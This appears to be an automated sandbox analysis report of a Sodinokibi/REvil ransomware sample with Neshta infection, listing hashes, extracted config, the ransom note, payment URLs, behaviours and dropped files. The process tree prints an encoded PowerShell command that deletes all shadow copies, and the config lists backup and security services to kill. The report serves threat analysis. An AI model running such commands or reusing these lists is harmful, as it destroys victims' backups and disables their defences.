Overview

overview

10

Static

static

10

07dfffd188...18.exe

windows7-x64

10

07dfffd188...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    29-04-2024 14:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe

  • Size

    204KB

  • MD5

    07dfffd188158429b2d86d28414ad08c

  • SHA1

    9cabd968c2fcb9a2c03d444c8cd7d8e003a17174

  • SHA256

    39ac4660e5ce9ba6df05d0c4c6459094854421d4604b325fa91a619e0841285c

  • SHA512

    c8590f51654dafc0f3ac9fd4aa6a33c247d58d2bf5d64bd3157dee1287da71280821054937cd556914d5ed72d351cb3d74026eff55185358460f604bb777ac94

  • SSDEEP

    3072:sr85C3oFiWjmfb+HP+rnRfUJcQmK4kIkGCdHwJK3Bc:k934jmfCHWtU+QL4kIpCNwE3G

Score
10/10
neshtasodinokibi1999persistenceransomwarespywarestealer

Malware Config

Extracted

Family

sodinokibi

Botnet

19

Campaign

99

Decoy

luvbec.com

eatyoveges.com

innersurrection.com

campusce.com

anchelor.com

medicalsupportco.com

photonag.com

rsidesigns.com

o2o-academy.com

hoteltantra.com

gaearoyals.com

arthakapitalforvaltning.dk

ntinasfiloxenia.gr

eafx.pro

smartmind.net

delegationhub.com

laylavalentine.com

michal-s.co.il

stathmoulis.gr

mariajosediazdemera.com
Attributes
  • net

    true

  • pid

    19

  • prc

    isqlplussvc

    firefoxconfig

    oracle

    ocssd

    powerpnt

    thebat64

    onenote

    sqlwriter

    outlook

    mysqld_nt

    excel

    sqlbrowser

    dbsnmp

    msaccess

    winword

    dbeng50

    visio

    ocautoupds

    encsvc

    tbirdconfig

    thebat

    sqlservr

    sqbcoreservice

    mysqld

    agntsvc

    xfssvccon

    mysqld_opt

    mydesktopservice

    ocomm

    msftesql

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    99

  • svc

    sql

    veeam

    backup

    memtas

    sophos

    svc$

    vss

    mepocs

Extracted

Path

C:\Users\pzeizd3-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion pzeizd3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7FC4493865765E17 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/7FC4493865765E17 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: e7OJYktNkK73/sSsm0Y+Lg9v9od/oX/e2/AOa+8txL56/BshUL+1w9mgZx4wmwFQ XjYMRp9Xz/EJzaE3GXM2fsVvgIfLYdA6o9gVYtm7bxBJ/xiYVLelmEjPWS2KBkbB lIlhRvQdiJmQ+Br6CtRdfHkxGgCk3syWPYHcAXcfJokS8JXHC73XjHa4PyBUmbex hY4aI51ix55uqicso5NXC3TRxPgIqNM6oJPJmrr8St0eJns/0pSYSycAePWnleyC 6a80vuRE7vKGqlnCxwJvVDhAfpv4qFpbw/0TOHO8505AFRkWvwQ2ENyBekKX181a RMFk4Bh8TlInMEIeZrpe3dyy9PdwwrrjCXYyNFLHcfUYdEa1FMIkLvCYybN5Sacm xLGPJuwUi6Z2yucITG293F6D6ymKM5Foq3ajNHCTj6AuosQvb9ZDa9/tm4NroN+8 +72wt8+NyiIxC9Xi0TP/7Obu66ewSaWgWcScZHp3g5wBXUPR9CgtBUaUWtSdGL5k 6CS8GUsVp2oZRav/HAoaXd6IwdKJk8PD6xUEldNacMDqDyb0561AsJJ4y7pxNFOD ND9Ant7ACSF7rmL4WGZjPskJqGy6gVN0DDVWCXG9O+ITSlr011FgsvzFN2TNGCD8 5U6vjdQ6wbcKlbS8YFR/v2QPwcytvSjx64PgPaIoQuhC3SEwFQQuC1OLAvxoZthj H8XllG8TZCj+O3x7fo6NYhZzJdHsNhPosrYfZ8EKEQ++YF4dQ0D6fx8m+ArfTY/R 4ugJXXJ7YVLzrOEOyT7b+KTOG+gmYrDp2LEZIxTx2g25EL4iyraxhN7uP7uyfHhv aRxYBZJwKkAh+TLY94IQUC3Zvrkhf/Jb8NwSxoPnFPJ8VWn3e/PPXdPxNCR4wrfX dyRHZ4sZAA5Kj0FObRlVdaB2nOHUjpvOK+lzbqALB/rLv6tD6oUXJW/7FXwT3BtR 8WTsvVo5KflX+bndXRGA7RktrHCBWQlrZZZDkIQORUEvMgmAFRfZla5mmBoLcI/y me5aI8YgIGLa7z6wZ9GDxNqGIFKQMTQAp77bTch3ZkeHUs/HNq8/tkIz1qMeC0Dy rhg8R0zyrm+cPVmXeztHjEUxmKlOQttvF+DHQ7FAktArowaPqVasWeH6Hbf9TuTG zJ92OQXbpMLmPbMUH6HqYWrDVPB4B/iXaujn87og5sOAqiwTDSWLE8InItihE7sX uObu2y4uLOUQ5A== Extension name: pzeizd3 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7FC4493865765E17

http://decryptor.top/7FC4493865765E17

Signatures

  • Detect Neshta payload 3 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Sodinokibi/Revil sample 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Users\Admin\AppData\Local\Temp\3582-490\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2552
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2724
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:316

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe
      Filesize

      547KB

      MD5

      cf6c595d3e5e9667667af096762fd9c4

      SHA1

      9bb44da8d7f6457099cb56e4f7d1026963dce7ce

      SHA256

      593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

      SHA512

      ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

      Download Submit

    • C:\Users\pzeizd3-readme.txt
      Filesize

      6KB

      MD5

      94aac319b9b20e211afd97edb457c496

      SHA1

      aabf1744818f05f17738d13e9357cff8494c594d

      SHA256

      a6cc5d8c2023a2736706571f90366448516c4e966dea18d080005b91498675a2

      SHA512

      b3e39cfa6fa97362ac697f2f21b7064b68879a1d53b0715396cf65176df3bb406e509c176cad6af82abe5807cc0df0122dbf766cc3f87093f0e008d687b15ad2

      Download Submit

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      Filesize

      252KB

      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe
      Filesize

      164KB

      MD5

      1ded173cba5c2992874c2a6e7bf400c0

      SHA1

      c65f1761502be63177d1d4643018eebe63eac9d2

      SHA256

      e8b5044a1fd6342ff6d367595a9e8cac8231c392b587d4ed94c4631d587a7feb

      SHA512

      4192be5d712ee0a8ddf256757ec6851bd51ac5437828c100f8b770567b92e3c8cebbb38121e64455a764d858bc50e957d7ea0c9ffc90351b0b80f638f1d3842a

      Download Submit

    • memory/1936-637-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/1936-639-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/2552-90-0x000000001B490000-0x000000001B772000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2552-91-0x0000000002890000-0x0000000002898000-memory.dmp

      Filesize

      32KB

      Download